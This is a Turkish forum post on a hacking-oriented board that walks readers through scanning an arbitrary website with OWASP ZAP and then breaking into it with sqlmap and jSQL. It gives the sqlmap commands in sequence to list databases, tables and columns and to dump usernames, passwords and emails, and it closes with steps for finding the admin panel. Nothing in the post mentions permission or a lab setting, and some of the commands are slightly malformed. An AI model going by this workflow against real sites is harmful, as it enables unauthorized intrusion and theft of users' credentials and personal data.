Herkese Merhaba,Sizlere Owasp ile web site güvenlik acıklarını bulmayı ve bu acıklardan faydalanmayı göstericem güvenlik acıklarını kastedigimde (SQL,XSS,HTML VB...)
Şimdi İlk Olarak Kali Linux u indirmek gerekir onun içinde https://www.kali.org/downloads/
Bunun İçin Sanal Makina Lazım https://www.virtualbox.org/ https://www.vmware.com/tr.html
Ve Sonra Linuxu Kurmak için ise https://www.mshowto.org/adim-adim-kali- ... ulumu.html
Şimdi Gelelim İşlemlerimize
1-ilk olarak terminali acıp owasp-zap yazıyoruz ve programımızın açılmasını bekliyoruz acıldıktan sonra herşeye hayır diyorsunuz
2-acıldıktan sonra ordaki yıldırım işaretine tıklıyorsunuz ve sitemizi yazıyoruz ve attack a tıklıyoruz
3-Acıkları taramaya başlıyor biraz bekleyiniz
4-Taramalar Bittikten Sonra Ordaki Bayrağa tıklıyoruz (sol tarafta uyarılar diyor orası )
5-Ordaki en kırmızı bölümü seçin en cok işimize yarayacak ve sisteme müdahele edecek acıklar orda
6-ve owasp ile son adımımız oranın içindeki acıklar ile sisteme sızmayı deneyin
--------------------SQLMAP---------------
1-Şimdi buldugumuz acıklar ile sisteme sızıcaz bunun için terminale gidip sqlmap i calıstırmamız lazım
2-bunun için sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs komutlar bunlar index yerine başka birşeyde olabilir sizde ne varsa onu girin
3-verileri aldıgımız zaman sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --tables
4-Sonraki komutumuza gelelim sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --tables -T tablo --columns bu komutla Tabloları elde etmiş oluruz
5-Gelelim son adımımıza sqlmap -u http://www.siteadı.com/index.php?id=2 --threads=10 --random-agent --dbs -D tabloda cıkan isim --T tablo -C burada sizde ne cıktıysa mesela user_id,user_password,user_email böyle yazıcaksınız ama sizde ne cıktıysa onları yazıcaksınız
6-En Son Adımımız ise admin panelini bulmaktır onun için JSQL adlı toolumuz lazım kurmak için terminalimizi acıp sudo apt-get install jsql yazarak kurabilirsiniz
calıstırmak için ise jsql yazabilirsiniz
7-JSQL yazdıktan sonra admin page kısmına gelerek üst tarafta sızmak istedigimiz sitenin linkini yapıstırın ve taramaya başlayın
Yardımcı Olduysam Bir Teşekürünüzü alırım sorunuz varsa yazınız
Owasp ile nasıl web site acıklarını bulmak
Web Güvenlik Açıkları'nın paylaşıldığı bölüm.
-
Başbug Attila
- Onbaşı
- Mesajlar: 4
- Kayıt: 12 Eyl 2020, 22:22
- Been thanked: 1 time
“WEB GÜVENLİK AÇIKLARI” sayfasına dön
Geçiş yap
- ANKA NEFERLER TİM
- ↳ DUYURULAR
- ↳ KENDİNİZİ TANITIN (YENİ ÜYELER)
- ↳ FORUM KURALLARI
- SİBER GÜVENLİK
- ↳ WEB GÜVENLİK AÇIKLARI
- ↳ BANKA VE MAİL GÜVENLİĞİ
- ↳ SOSYAL MÜHENDİSLİK
- ↳ SERVER GÜVENLİĞİ
- ↳ ŞİFRELEME
- ↳ TROJAN VE VİRÜSLER
- ↳ NETWORK GÜVENLİĞİ
- ↳ EXPLOİTLER
- GÖVDE GÖSTERİSİ
- ↳ GÖVDE GÖSTERİSİ
- YARDIM MERKEZİ
- ↳ YARDIM MERKEZİ
- GRAFİK VE VİDEO TASARIM
- ↳ GRAFİK TASARIM
- ↳ VİDEO TASARIM
- ↳ TASARIM PROGRAMLARI
- ↳ PHOTOSHOP
- ↳ ILLUSTRATOR
- ↳ FIREWORKS
- ↳ AFTER EFFECTS
- ↳ PREMİERE PRO
- ↳ YARDIM
- İŞLETİM SİSTEMLERİ
- ↳ WİNDOWS İŞLETİM SİSTEMLERİ
- ↳ PARDUS
- ↳ LİNUX
- ↳ MAC OS X
- ↳ DİĞER İŞLETİM SİSTEMLERİ
- WEBMASTER HAZIR SİSTEMLER VE ŞABLONLAR
- ↳ JOOMLA
- ↳ WORDPRESS
- ↳ VBULLETİN
- ↳ SMF(SİMPLE MACHİNES FORUM)
- ↳ MYSQL
- ↳ LOCALHOSTLAR; WAMPSERVER VE XAMPP
- PROGRAMLAMA
- ↳ GENEL DİLLER
- ↳ PHP,HTML
- ↳ ASP-ASP.NET-C#
- ↳ PHYTON
- ↳ JAVA
- MOBİL CİHAZLAR
- ↳ ANDROİD
- ↳ İOS,APPLE,İPAD
- ↳ TABLETLER
- ↳ WİNDOWS PHONE
- GENEL
- ↳ HABERLER
- ↳ TÜRK TARİHİ
- ↳ İSLAMİYET
- ↳ SORU/CEVAP
- ↳ ŞİKAYETLER
- ↳ KONU DIŞI
